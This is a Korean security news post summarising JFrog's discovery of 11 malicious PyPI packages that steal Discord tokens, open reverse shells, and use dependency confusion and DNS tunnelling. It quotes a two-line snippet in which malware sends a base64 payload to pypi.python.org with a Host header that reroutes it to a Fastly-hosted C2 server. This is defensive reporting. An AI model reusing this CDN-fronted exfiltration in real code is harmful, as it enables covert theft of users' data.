상세 컨텐츠

본문 제목

PyPI 저장소에서 악성 파이썬 패키지 11개 발견돼

국내외 보안동향

by 알약4 2021. 11. 22. 14:00

본문

Experts found 11 malicious Python packages in the PyPI repository

 

Jfrog의 연구원들이 PyPI(Python Package Index) 저장소에서 Discord의 액세스 토큰 및 패스워드를 훔치고 종속성 혼란 공격을 수행할 수 있는 악성 파이썬 패키지 11개를 발견했습니다.

 

아래는 악성 파이썬 패키지 목록입니다.

 

importantpackage / important-package

pptest

ipboards

owlmoon

DiscordSafety

trrfab

10Cent10 / 10Cent11

yandex-yt

yiffparty

 

"importantpackage", "10Cent10", "10Cent11" 패키지는 해킹된 시스템에 리버스 셸을 설정할 수 있었습니다.

 

전문가들은 "importantpackage" 패키지가 데이터 유출을 위해 CDN TLS 종료를 악용했다고 지적했습니다. 이는 Fastly CDN을 사용해 C2 서버와의 통신을 pypi.org와의 통신으로 위장했습니다.

 

해당 악성코드의 통신은 꽤 간단했습니다.

 

url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload

r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

 

이 코드는 HTTPS 요청이(PyPI에 대한 합법적인 요청과 구별 불가) pypi.python.org로 전송되도록 하며, 추후 CDN은 이를 ​​C2 서버인 psec.forward.io.global.prod.fastly.net에 대한 HTTP 요청으로 다시 라우팅합니다.(반대의 경우 양방향 통신 허용)

 

"ipboards", "trrfab" 패키지는 종속성 혼동 기술을 통해 민감 정보를 추출 가능했습니다.

 

종속성 혼동 기술은 합법적인 내부 개인 패키지와 이름이 같지만 버전이 더 높은 변조된 컴포넌트를 공개 저장소에 업로드하는 것입니다. 이 기술은 타깃의 패키지 관리자가 악성 모듈을 다운로드하여 설치하도록 속입니다.

 

"ipboards" "pptest" 패키지는 데이터 유출을 위해 DNS 터널링을 사용하는 것으로 나타났으며, PyPI에 업로드된 악성코드에서 악성 pac이 이러한 기술을 사용한 것은 이번이 처음입니다.

 

"이 악성 패키지 세트는 이전 발견과 동일한 '이빨'을 갖고 있지 않을 수 있지만, 주목할만한 것은 공격의 정교함 수준이 나날이 발전하고 있다는 것입니다. 이들은 날이 밝을 때는 당신의 지갑을 노리지 않지만, 훨씬 더 많은 속임수를 가지고 있으며 일부는 초기 정찰 이후 위험한 페이로드를 실행하는 대신 후속 공격을 준비할 수 있습니다.

 

 

 

 

출처:

https://securityaffairs.co/wordpress/124861/hacking/malicious-pypi-python-packages.html

https://jfrog.com/blog/python-malware-imitates-signed-pypi-traffic-in-novel-exfiltration-technique/

관련글 더보기

댓글 영역